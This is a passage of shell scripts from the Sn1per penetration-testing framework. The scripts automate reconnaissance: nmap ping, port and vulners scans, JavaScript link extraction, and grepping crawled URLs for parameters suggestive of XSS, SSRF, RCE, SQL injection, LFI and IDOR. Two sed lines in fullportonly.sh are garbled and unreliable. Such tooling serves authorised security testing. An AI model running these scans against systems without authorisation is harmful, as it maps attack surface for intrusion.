27 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
28 | echo -e "$OKRED DISPLAYING JAVASCRIPT URLS $RESET"
29 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
30 | grep -h http $LOOT_DIR/web/javascript-linkfinder-$TARGET-*.txt 2> /dev/null | grep -v "Running " | awk '{print $1}' | egrep "http\:\/\/|https\:\/\/" | sort -u | tee $LOOT_DIR/web/javascript-$TARGET-linkfinder-urls.txt
31 | sort -u $LOOT_DIR/web/javascript-$TARGET-urls.txt $LOOT_DIR/web/javascript-$TARGET-linkfinder-urls.txt 2> /dev/null > $LOOT_DIR/web/javascript-$TARGET-urls-sorted.txt
32 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
33 | echo -e "$OKRED DISPLAYING JAVASCRIPT DOMAINS $RESET"
34 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
35 | grep -h http $LOOT_DIR/web/javascript-linkfinder-$TARGET-*.txt 2> /dev/null | grep -v "Running " | awk '{print $1}' | egrep "http\:\/\/|https\:\/\/" | cut -d\/ -f3 | sort -u | tee $LOOT_DIR/web/javascript-$TARGET-domains.txt
36 | WEB_JAVASCRIPT_ANALYSIS="0"
37 |
--------------------------------------------------------------------------------
/modes/static-grep-search.sh:
--------------------------------------------------------------------------------
1 | if [[ $STATIC_GREP_SEARCH == "1" ]]; then
2 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
3 | echo -e "$OKRED RUNNING INTERESTING EXTENSIONS STATIC ANALYSIS $RESET"
4 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
5 | cat $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | egrep -iE "$GREP_EXTENSIONS" | tee $LOOT_DIR/web/static-extensions-$TARGET.txt | head -n $GREP_MAX_LINES
6 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
7 | echo -e "$OKRED RUNNING INTERESTING PARAMETERS STATIC ANALYSIS $RESET"
8 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
9 | grep '?' $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | egrep -iE "$GREP_PARAMETERS" | tee $LOOT_DIR/web/static-parameters-$TARGET.txt | head -n $GREP_MAX_LINES
10 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
11 | echo -e "$OKRED RUNNING XSS STATIC ANALYSIS $RESET"
12 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
13 | grep '?' $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | egrep -iE "$GREP_XSS" | tee $LOOT_DIR/web/static-xss-$TARGET.txt | head -n $GREP_MAX_LINES
14 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
15 | echo -e "$OKRED RUNNING SSRF STATIC ANALYSIS $RESET"
16 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
17 | grep '?' $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | egrep -iE "$GREP_SSRF" | tee $LOOT_DIR/web/static-ssrf-$TARGET.txt | head -n $GREP_MAX_LINES
18 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
19 | echo -e "$OKRED RUNNING REDIRECT STATIC ANALYSIS $RESET"
20 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
21 | grep '?' $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | egrep -iE "$GREP_REDIRECT" | tee $LOOT_DIR/web/static-redirect-$TARGET.txt | head -n $GREP_MAX_LINES
22 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
23 | echo -e "$OKRED RUNNING RCE STATIC ANALYSIS $RESET"
24 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
25 | grep '?' $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | egrep -iE "$GREP_RCE" | tee $LOOT_DIR/web/static-rce-$TARGET.txt | head -n $GREP_MAX_LINES
26 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
27 | echo -e "$OKRED RUNNING IDOR STATIC ANALYSIS $RESET"
28 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
29 | grep '?' $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | egrep -iE "$GREP_IDOR" | tee $LOOT_DIR/web/static-idor-$TARGET.txt | head -n $GREP_MAX_LINES
30 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
31 | echo -e "$OKRED RUNNING SQL STATIC ANALYSIS $RESET"
32 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
33 | grep '?' $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | egrep -iE "$GREP_SQL" | tee $LOOT_DIR/web/static-sql-$TARGET.txt | head -n $GREP_MAX_LINES
34 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
35 | echo -e "$OKRED RUNNING LFI STATIC ANALYSIS $RESET"
36 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
37 | grep '?' $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | egrep -iE "$GREP_LFI" | tee $LOOT_DIR/web/static-lfi-$TARGET.txt | head -n $GREP_MAX_LINES
38 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
39 | echo -e "$OKRED RUNNING SSTI STATIC ANALYSIS $RESET"
40 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
41 | grep '?' $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | egrep -iE "$GREP_SSTI" | tee $LOOT_DIR/web/static-ssti-$TARGET.txt | head -n $GREP_MAX_LINES
42 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
43 | echo -e "$OKRED RUNNING DEBUG STATIC ANALYSIS $RESET"
44 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
45 | grep '?' $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | egrep -iE "$GREP_DEBUG" | tee $LOOT_DIR/web/static-debug-$TARGET.txt | head -n $GREP_MAX_LINES
46 | fi
--------------------------------------------------------------------------------
/modes/discover.sh:
--------------------------------------------------------------------------------
1 | # DISCOVER MODE #####################################################################################################
2 | if [[ "$MODE" = "discover" ]]; then
3 | if [[ "$REPORT" = "1" ]]; then
4 | if [[ ! -z "$WORKSPACE" ]]; then
5 | WORKSPACE="$(echo $WORKSPACE | tr / -)"
6 | args="$args -w $WORKSPACE"
7 | LOOT_DIR=$INSTALL_DIR/loot/workspace/$WORKSPACE
8 | echo -e "$OKBLUE[*]$RESET Saving loot to $LOOT_DIR $OKBLUE[$RESET${OKGREEN}OK${RESET}$OKBLUE]$RESET"
9 | mkdir -p $LOOT_DIR 2> /dev/null
10 | mkdir $LOOT_DIR/ips 2> /dev/null
11 | mkdir $LOOT_DIR/screenshots 2> /dev/null
12 | mkdir $LOOT_DIR/nmap 2> /dev/null
13 | mkdir $LOOT_DIR/notes 2> /dev/null
14 | mkdir $LOOT_DIR/reports 2> /dev/null
15 | mkdir $LOOT_DIR/output 2> /dev/null
16 | mkdir $LOOT_DIR/scans 2> /dev/null
17 | fi
18 | OUT_FILE="$(echo $TARGET | tr / -)"
19 | echo "$TARGET $MODE `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt 2> /dev/null
20 | echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/$OUT_FILE-$MODE.txt 2> /dev/null
21 | echo "[sn1persecurity.com] •?((¯°·._.• Started Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
22 | if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
23 | /bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Started Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
24 | fi
25 | sniper -t $TARGET -m $MODE --noreport $args | tee $LOOT_DIR/output/sniper-$MODE-`date +"%Y%m%d%H%M"`.txt 2>&1
26 | exit
27 | fi
28 | echo -e "$OKRED ____ /\\"
29 | echo -e "$OKRED Sn1per by @xer0dayz @Sn1perSecurity \ \\"
30 | echo -e "$OKRED https://sn1persecurity.com \ \\"
31 | echo -e "$OKRED ___ / \\"
32 | echo -e "$OKRED \ \\"
33 | echo -e "$OKRED === > [ \\"
34 | echo -e "$OKRED / \ \\"
35 | echo -e "$OKRED \ / /"
36 | echo -e "$OKRED === > [ /"
37 | echo -e "$OKRED / /"
38 | echo -e "$OKRED ___ \ /"
39 | echo -e "$OKRED / /"
40 | echo -e "$OKRED ____ / /"
41 | echo -e "$OKRED \/$RESET"
42 | echo ""
43 | OUT_FILE=$(echo $TARGET | tr / -)
44 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
45 | echo -e "$OKRED RUNNING PING DISCOVERY SCAN $RESET"
46 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
47 | nmap -n -sP $TARGET | tee $LOOT_DIR/ips/sniper-$OUT_FILE-ping.txt
48 | cat $LOOT_DIR/ips/sniper-$OUT_FILE-ping.txt 2> /dev/null | grep "scan report" | awk '{print $5}' > $LOOT_DIR/ips/sniper-$OUT_FILE-ping-sorted.txt
49 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
50 | echo -e "$OKRED RUNNING TCP PORT SCAN $RESET"
51 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
52 | nmap -n -v -p $QUICK_PORTS $NMAP_OPTIONS -sS $TARGET -Pn 2> /dev/null | grep "open port" | tee $LOOT_DIR/ips/sniper-$OUT_FILE-tcp.txt 2>/dev/null
53 | cat $LOOT_DIR/ips/sniper-$OUT_FILE-tcp.txt | grep open | grep on | awk '{print $6}' > $LOOT_DIR/ips/sniper-$OUT_FILE-tcpips.txt
54 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
55 | echo -e "$OKRED RUNNING UDP PORT SCAN $RESET"
56 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
57 | nmap -n -v -p $DEFAULT_UDP_PORTS $NMAP_OPTIONS -sU -Pn $TARGET 2> /dev/null | grep "open port" | tee $LOOT_DIR/ips/sniper-$OUT_FILE-udp.txt 2>/dev/null
58 | cat $LOOT_DIR/ips/sniper-$OUT_FILE-udp.txt | grep open | grep on | awk '{print $6}' > $LOOT_DIR/ips/sniper-$OUT_FILE-udpips.txt
59 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
60 | echo -e "$OKRED CURRENT TARGETS $RESET"
61 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
62 | cat $LOOT_DIR/ips/sniper-$OUT_FILE-ping-sorted.txt $LOOT_DIR/ips/sniper-$OUT_FILE-tcpips.txt $LOOT_DIR/ips/sniper-$OUT_FILE-udpips.txt 2> /dev/null > $LOOT_DIR/ips/sniper-$OUT_FILE-ips-unsorted.txt
63 | sort -u $LOOT_DIR/ips/sniper-$OUT_FILE-ips-unsorted.txt > $LOOT_DIR/ips/discover-$OUT_FILE-sorted.txt
64 | cat $LOOT_DIR/ips/discover-$OUT_FILE-sorted.txt
65 | echo ""
66 | echo -e "$OKRED[+]$RESET Target list saved to $LOOT_DIR/ips/discover-$OUT_FILE-sorted.txt "
67 | echo -e "$OKRED[i] To scan all IP's, use sniper -f $LOOT_DIR/ips/discover-$OUT_FILE-sorted.txt -m flyover -w $WORKSPACE $RESET"
68 | source $INSTALL_DIR/modes/sc0pe.sh
69 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
70 | echo -e "$OKRED SCAN COMPLETE! $RESET"
71 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
72 | echo "[sn1persecurity.com] •?((¯°·._.• Finished Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
73 | if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
74 | /bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Finished Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
75 | fi
76 | sniper -f $LOOT_DIR/ips/discover-$OUT_FILE-sorted.txt -m flyover -w $WORKSPACE
77 | exit
78 | fi
--------------------------------------------------------------------------------
/modes/fullportonly.sh:
--------------------------------------------------------------------------------
1 | # FULLPORTONLY MODE
2 | if [[ "$MODE" = "fullportonly" ]]; then
3 | if [[ "$REPORT" = "1" ]]; then
4 | args="-t $TARGET"
5 | if [[ ! -z "$WORKSPACE" ]]; then
6 | args="$args -w $WORKSPACE"
7 | LOOT_DIR=$INSTALL_DIR/loot/workspace/$WORKSPACE
8 | echo -e "$OKBLUE[*]$RESET Saving loot to $LOOT_DIR [$RESET${OKGREEN}OK${RESET}$OKBLUE]$RESET"
9 | mkdir -p $LOOT_DIR 2> /dev/null
10 | mkdir $LOOT_DIR/domains 2> /dev/null
11 | mkdir $LOOT_DIR/screenshots 2> /dev/null
12 | mkdir $LOOT_DIR/nmap 2> /dev/null
13 | mkdir $LOOT_DIR/notes 2> /dev/null
14 | mkdir $LOOT_DIR/reports 2> /dev/null
15 | mkdir $LOOT_DIR/scans 2> /dev/null
16 | mkdir $LOOT_DIR/output 2> /dev/null
17 | fi
18 | args="$args --noreport -m fullportonly"
19 | echo "$TARGET $MODE `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt 2> /dev/null
20 | echo "sniper -t $TARGET -m $MODE --noreport " >> $LOOT_DIR/scans/running_${TARGET}_${MODE}.txt
21 | ls -lh $LOOT_DIR/scans/running_*.txt 2> /dev/null | wc -l 2> /dev/null > $LOOT_DIR/scans/tasks-running.txt
22 | sniper $args | tee $LOOT_DIR/output/sniper-$TARGET-$MODE-`date +"%Y%m%d%H%M"`.txt 2>&1
23 | exit
24 | fi
25 | logo
26 | echo "[sn1persecurity.com] •?((¯°·._.• Started Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
27 | if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
28 | /bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Started Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
29 | fi
30 | echo "$TARGET" >> $LOOT_DIR/domains/targets.txt
31 | if [[ -f "/usr/share/sniper/pro/.portscanner.conf" ]]; then
32 | source /usr/share/sniper/pro/.portscanner.conf
33 | fi
34 | if [[ -z "$PORT" ]]; then
35 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
36 | echo -e "$OKRED PERFORMING TCP PORT SCAN $RESET"
37 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
38 | nmap $NMAP_OPTIONS -sU -sS --script=/usr/share/nmap/scripts/vulners -oX $LOOT_DIR/nmap/nmap-$TARGET.xml -p $FULL_PORTSCAN_PORTS $TARGET | tee $LOOT_DIR/nmap/nmap-$TARGET
39 | sed -r "s/ /dev/null > $LOOT_DIR/nmap/nmap-$TARGET.txt 2> /dev/null
40 | rm -f $LOOT_DIR/nmap/nmap-$TARGET 2> /dev/null
41 | xsltproc $INSTALL_DIR/bin/nmap-bootstrap.xsl $LOOT_DIR/nmap/nmap-$TARGET.xml -o $LOOT_DIR/nmap/nmapreport-$TARGET.html 2> /dev/null
42 | else
43 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
44 | echo -e "$OKRED PERFORMING TCP PORT SCAN $RESET"
45 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
46 | nmap $NMAP_OPTIONS -sU -sS --script=/usr/share/nmap/scripts/vulners -p $PORT -oX $LOOT_DIR/nmap/nmap-$TARGET-tcp-port$PORT.xml $TARGET | tee $LOOT_DIR/nmap/nmap-$TARGET
47 | sed -r "s/ /dev/null > $LOOT_DIR/nmap/nmap-$TARGET.txt 2> /dev/null
48 | rm -f $LOOT_DIR/nmap/nmap-$TARGET 2> /dev/null
49 | xsltproc $INSTALL_DIR/bin/nmap-bootstrap.xsl $LOOT_DIR/nmap/nmap-$TARGET.xml -o $LOOT_DIR/nmap/nmapreport-$TARGET.html 2> /dev/null
50 | fi
51 | cp -f $LOOT_DIR/nmap/nmapreport-$TARGET.html $LOOT_DIR/nmap/nmapreport-$TARGET-`date +"%Y-%m-%d-%H-%M"`.html 2> /dev/null
52 | echo "$TARGET" >> $LOOT_DIR/scans/updated.txt
53 | rm -f $LOOT_DIR/scans/running_${TARGET}_${MODE}.txt 2> /dev/null
54 | ls -lh $LOOT_DIR/scans/running_*.txt 2> /dev/null | wc -l 2> /dev/null > $LOOT_DIR/scans/tasks-running.txt
55 | HOST_UP=$(cat $LOOT_DIR/nmap/nmap-$TARGET.txt $LOOT_DIR/nmap/nmap-$TARGET-*.txt 2> /dev/null | grep "host up" 2> /dev/null)
56 | if [[ ${#HOST_UP} -ge 2 ]]; then
57 | echo "$TARGET" >> $LOOT_DIR/nmap/livehosts-unsorted.txt 2> /dev/null
58 | fi
59 | sort -u $LOOT_DIR/nmap/livehosts-unsorted.txt 2> /dev/null > $LOOT_DIR/nmap/livehosts-sorted.txt 2> /dev/null
60 | mv -f $LOOT_DIR/nmap/ports-$TARGET.txt $LOOT_DIR/nmap/ports-$TARGET.old 2> /dev/null
61 | for PORT in `cat $LOOT_DIR/nmap/nmap-$TARGET.xml $LOOT_DIR/nmap/nmap-$TARGET-*.xml 2>/dev/null | egrep 'state="open"' | cut -d' ' -f3 | cut -d\" -f2 | sort -u | grep '[[:digit:]]'`; do
62 | echo "$PORT " >> $LOOT_DIR/nmap/ports-$TARGET.txt
63 | done
64 | diff $LOOT_DIR/nmap/ports-$TARGET.old $LOOT_DIR/nmap/ports-$TARGET.txt 2> /dev/null > $LOOT_DIR/nmap/ports-$TARGET.diff 2> /dev/null
65 | cat $LOOT_DIR/nmap/nmap-$TARGET.txt $LOOT_DIR/nmap/nmap-$TARGET-*.txt 2>/dev/null | egrep "MAC Address:" | awk '{print $3 " " $4 " " $5 " " $6}' > $LOOT_DIR/nmap/macaddress-$TARGET.txt 2> /dev/null
66 | cat $LOOT_DIR/nmap/nmap-$TARGET.txt $LOOT_DIR/nmap/nmap-$TARGET-*.txt $LOOT_DIR/output/nmap-$TARGET-*.txt 2>/dev/null | egrep "OS details:|OS guesses:" | cut -d\: -f2 | sed 's/,//g' | head -c50 - > $LOOT_DIR/nmap/osfingerprint-$TARGET.txt 2> /dev/null
67 | if [[ "$SLACK_NOTIFICATIONS_NMAP" == "1" ]]; then
68 | /bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/nmap/nmap-$TARGET.txt"
69 | /bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/nmap/nmap-$TARGET-udp.txt"
70 | fi
71 | if [[ -s "$LOOT_DIR/nmap/ports-$TARGET.diff" ]]; then
72 | echo "[sn1persecurity.com] •?((¯°·._.• Port change detected on $TARGET (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
73 | cat $LOOT_DIR/nmap/ports-$TARGET.diff 2> /dev/null | egrep "<|>" >> $LOOT_DIR/scans/notifications_new.txt 2> /dev/null
74 | if [[ "$SLACK_NOTIFICATIONS_NMAP_DIFF" == "1" ]]; then
75 | /bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Port change detected on $TARGET (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
76 | /bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/nmap/ports-$TARGET.diff"
77 | fi
78 | fi
79 | echo "[sn1persecurity.com] •?((¯°·._.• Finished Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
80 | if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
81 | /bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Finished Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
82 | fi
83 | if [[ "$SC0PE_VULNERABLITY_SCANNER" == "1" ]]; then
84 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
85 | echo -e "$OKRED RUNNING SC0PE PASSIVE WEB VULNERABILITY SCAN $RESET"
86 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
87 | SSL="false"
88 | PORT="80"
89 | source $INSTALL_DIR/modes/sc0pe-passive-webscan.sh
90 | SSL="true"
91 | PORT="443"
92 | source $INSTALL_DIR/modes/sc0pe-passive-webscan.sh
93 | for file in `ls $INSTALL_DIR/templates/passive/web/recursive/*.sh 2> /dev/null`; do
94 | source $file
95 | done
96 | source $INSTALL_DIR/modes/sc0pe-network-scan.sh
97 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
98 | source $INSTALL_DIR/modes/sc0pe.sh
99 | fi
100 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
101 | echo -e "$OKRED SCAN COMPLETE! $RESET"
102 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
103 | loot
104 | exit
105 | fi
106 |
107 | if [[ "$MODE" = "port" ]]; then
108 | if [[ -z "$PORT" ]]; then
109 | echo -e "$OKRED + -- --=[Error: You need to enter a port number. $RESET"
110 | exit
111 | fi
112 | fi
113 |
--------------------------------------------------------------------------------